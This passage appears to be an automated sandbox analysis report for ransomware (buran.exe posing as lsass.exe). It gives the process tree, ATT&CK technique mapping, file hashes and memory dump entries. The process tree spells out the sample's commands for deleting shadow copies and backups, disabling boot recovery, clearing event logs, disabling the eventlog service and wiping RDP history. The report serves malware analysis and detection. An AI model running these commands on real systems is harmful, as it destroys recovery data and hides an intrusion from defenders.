C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -start
2⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1636

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
3⤵
PID:2356

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
3⤵
PID:3184

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
3⤵
PID:3012

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup
3⤵
PID:3588

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup -keepversions:0
3⤵
PID:3204

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wbadmin delete backup
3⤵
PID:1160

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
3⤵
- Suspicious use of WriteProcessMemory
PID:2504

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:188

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
3⤵
- Suspicious use of WriteProcessMemory
PID:2208

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
4⤵
- Interacts with shadow copies
PID:3820

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
3⤵
- Suspicious use of WriteProcessMemory
PID:3052

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
4⤵
PID:3576

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
3⤵
- Suspicious use of WriteProcessMemory
PID:496

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
4⤵
PID:2392

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
3⤵
- Suspicious use of WriteProcessMemory
PID:2588

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
4⤵
PID:2452

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C attrib "%userprofile%\documents\Default.rdp" -s -h
3⤵
PID:1276

C:\Windows\SysWOW64\attrib.exe
attrib "C:\Users\Admin\documents\Default.rdp" -s -h
4⤵
- Views/modifies file attributes
PID:2128

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C del "%userprofile%\documents\Default.rdp"
3⤵
PID:4076

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Application
3⤵
PID:3060

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe clear-log Application
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2120

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Security
3⤵
PID:1648

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe clear-log Security
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2748

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log System
3⤵
PID:2184

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe clear-log System
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1400

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C sc config eventlog start=disabled
3⤵
PID:3548

C:\Windows\SysWOW64\sc.exe
sc config eventlog start=disabled
4⤵
PID:1128

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -agent 0
3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3836

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -agent 1
3⤵
- Executes dropped EXE
PID:1380

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del "C:\Users\Admin\AppData\Local\Temp\buran.exe" & if not exist "C:\Users\Admin\AppData\Local\Temp\buran.exe" exit )
2⤵
- Suspicious use of WriteProcessMemory
PID:1056

C:\Windows\SysWOW64\PING.EXE
ping -n 3 127.1
3⤵
- Runs ping.exe
PID:2100

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4088

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Indicator Removal on Host

T1070

File Deletion

T1107

Modify Registry

T1112

Install Root Certificate

T1130

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB
MD5
149e1d142e9d7c2fca97f1fef05c59c8

SHA1
85a61dcf4a5474018cde498c8ae4f45c6c4c63c3

SHA256
ad06238a22fe68072bf7ab8f7b4423dc7c90296e41c7f3d7a16cc6d6f7010a82

SHA512
a8ff1e8effe3a9d458db74b9239f530b39f7b5ea74921ea285762e167d20d216698729ea60a94dec60e1ee6913245c4b1c56d66cf2252dc80fa1e7fff94ce17a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE
MD5
bb43ca1db0fadc6ae53f5f74b390683b

SHA1
5785179b5a50c78c5f7b0575d34566a3f417d151

SHA256
7f3f97971e82a3aeaacb64f8feb0ef7df11db650211c065e92a320bf4adc0690

SHA512
4611364f95ccbaec4f29ca1728374c452b93c51b5debad83828d3fde5fdc5c0ac090134a7a759fa5e2d9de018a0871354a482bb9f023564938adf0ba51bcb32d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
MD5
7769e706f7b0c56e9605a81623599f0b

SHA1
3d83a8866e647b78d8201cb4a0500ce926b76f68

SHA256
ccf11aa28a6025572b9b4c89c12ce6f557bf6a578f187d7bfd6cd6f993b8ea63

SHA512
d7187bf6636b23bb53c169ea714f2ab0b5994595ca8bb7347f7071ea10d322c398f092c2185151e7fed368bc08a92505fff387feeacd970b2ba877176aab73b6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB
MD5
01af71658f8903dab9568aea0cccda57

SHA1
eee0461ce62be9028842632862149fd6edc2af19

SHA256
21cfc25e74da4f93a3532dbb3a9202a8dde43d393b8c16e2113cc2c22f8a1a76

SHA512
9b919a08c308735298434067a96cb28ebfe569716bfeaa2ae505662846d80b6758bb35ac9729d865af133318e25de17a311d519788474d793e88c88fd2fd376b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE
MD5
c5dd9d4db0f4f6b03a6291a6faefb9fb

SHA1
8930d13e692723bb10ee8b6d78dea8b2e694490e

SHA256
6d34671eb68fe86da4f46521d1d92bf68fd970a0c8c2418f7b7ab878918408b1

SHA512
e7f1fe083c2134250bf47bb77be171712a3afdfba35264ae0a3bd6221e9b8b417c53f2ca555d589db1f6c037386f04fe28b1e006cd906bee52f8cb1b942c3bf0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
MD5
7ba42e82897d6cc5badc96eeac5eb59c

SHA1
05720eb516a52cd1b9f38e17ec1312d5cbba645b

SHA256
247e78221185de959fc87612603a469a6a68b1398c1b7b9e21c791de2e8c72d9

SHA512
695c73d06709da6247ddeb1b8778262daa5c90e1f0c7fdacddf490a5602db05815fe245f24312d2e7800fa7e91a37fc2bde9c8aeaa4f1c34ee4862e9a39193d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\RW8YYLAG\1QE7L3Q8.htm
MD5
b1cd7c031debba3a5c77b39b6791c1a7

SHA1
e5d91e14e9c685b06f00e550d9e189deb2075f76

SHA256
57ba053f075e0b80f747f3102ed985687c16a8754d109e7c4d33633269a36aaa

SHA512
d2bbefdc1effb52a38964c4cec5990a5a226248eca36f99e446c0c5704436f666bf1cb514e73b8991411d497d3325ecc646cbd5065c364e92ab6b9c5f1ad4a72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\UOAPEAJQ\R108ESDY.htm
MD5
8615e70875c2cc0b9db16027b9adf11d

SHA1
4ed62cf405311c0ff562a3c59334a15ddc4f1bf9

SHA256
da96949ba6b0567343f144486505c8c8fa1d892fd88c9cbc3ef3d751a570724d

SHA512
cd9dfc88dc2af9438b7d6b618d1b62029b3bdf739fc4daa5b37397afd12c4528561b3bf2fc3f3f2adf3fd1f582d5524332441fd30248fcd078e41aa91e17cb73

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
MD5
3058d76e5fb2f2d2f65e232e98536182

SHA1
3e6e9abd6241526bf932885d118cbbe54e4e1cbe

SHA256
5c1141aa7d0b9fba71822607f3b1b086e2cc4529e63221a9a6ede74fa366512f

SHA512
b47bc559e183abe8d4be8e7b1f652f01bab0095bf37797d95a541d729dad82a8a1eb1a804bc7c009ab3d49b446498a2e6b487f680bb203df3e17c212f85dfd95

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
MD5
3058d76e5fb2f2d2f65e232e98536182

SHA1
3e6e9abd6241526bf932885d118cbbe54e4e1cbe

SHA256
5c1141aa7d0b9fba71822607f3b1b086e2cc4529e63221a9a6ede74fa366512f

SHA512
b47bc559e183abe8d4be8e7b1f652f01bab0095bf37797d95a541d729dad82a8a1eb1a804bc7c009ab3d49b446498a2e6b487f680bb203df3e17c212f85dfd95

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
MD5
3058d76e5fb2f2d2f65e232e98536182

SHA1
3e6e9abd6241526bf932885d118cbbe54e4e1cbe

SHA256
5c1141aa7d0b9fba71822607f3b1b086e2cc4529e63221a9a6ede74fa366512f

SHA512
b47bc559e183abe8d4be8e7b1f652f01bab0095bf37797d95a541d729dad82a8a1eb1a804bc7c009ab3d49b446498a2e6b487f680bb203df3e17c212f85dfd95

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
MD5
3058d76e5fb2f2d2f65e232e98536182

SHA1
3e6e9abd6241526bf932885d118cbbe54e4e1cbe

SHA256
5c1141aa7d0b9fba71822607f3b1b086e2cc4529e63221a9a6ede74fa366512f

SHA512
b47bc559e183abe8d4be8e7b1f652f01bab0095bf37797d95a541d729dad82a8a1eb1a804bc7c009ab3d49b446498a2e6b487f680bb203df3e17c212f85dfd95

Download Submit
memory/188-24-0x0000000000000000-mapping.dmp

Download
memory/208-2-0x0000000000000000-mapping.dmp

Download
memory/496-29-0x0000000000000000-mapping.dmp

Download
memory/1056-7-0x0000000000000000-mapping.dmp

Download
memory/1128-43-0x0000000000000000-mapping.dmp

Download
memory/1160-22-0x0000000000000000-mapping.dmp

Download
memory/1276-33-0x0000000000000000-mapping.dmp

Download
memory/1380-45-0x0000000000000000-mapping.dmp

Download
memory/1400-41-0x0000000000000000-mapping.dmp

Download
memory/1636-5-0x0000000000000000-mapping.dmp

Download
memory/1648-38-0x0000000000000000-mapping.dmp

Download
memory/2100-9-0x0000000000000000-mapping.dmp

Download
memory/2120-37-0x0000000000000000-mapping.dmp

Download
memory/2128-34-0x0000000000000000-mapping.dmp

Download
memory/2184-40-0x0000000000000000-mapping.dmp

Download
memory/2208-25-0x0000000000000000-mapping.dmp

Download
memory/2356-17-0x0000000000000000-mapping.dmp

Download
memory/2392-30-0x0000000000000000-mapping.dmp

Download
memory/2452-32-0x0000000000000000-mapping.dmp

Download
memory/2504-23-0x0000000000000000-mapping.dmp

Download
memory/2540-3-0x0000000000000000-mapping.dmp

Download
memory/2588-31-0x0000000000000000-mapping.dmp

Download
memory/2748-39-0x0000000000000000-mapping.dmp

Download
memory/3012-19-0x0000000000000000-mapping.dmp

Download
memory/3052-27-0x0000000000000000-mapping.dmp

Download
memory/3060-36-0x0000000000000000-mapping.dmp

Download
memory/3184-18-0x0000000000000000-mapping.dmp

Download
memory/3204-21-0x0000000000000000-mapping.dmp

Download
memory/3548-42-0x0000000000000000-mapping.dmp

Download
memory/3576-28-0x0000000000000000-mapping.dmp

Download
memory/3588-20-0x0000000000000000-mapping.dmp

Download
memory/3820-26-0x0000000000000000-mapping.dmp

Download
memory/3836-44-0x0000000000000000-mapping.dmp

Download
memory/4076-35-0x0000000000000000-mapping.dmp

Download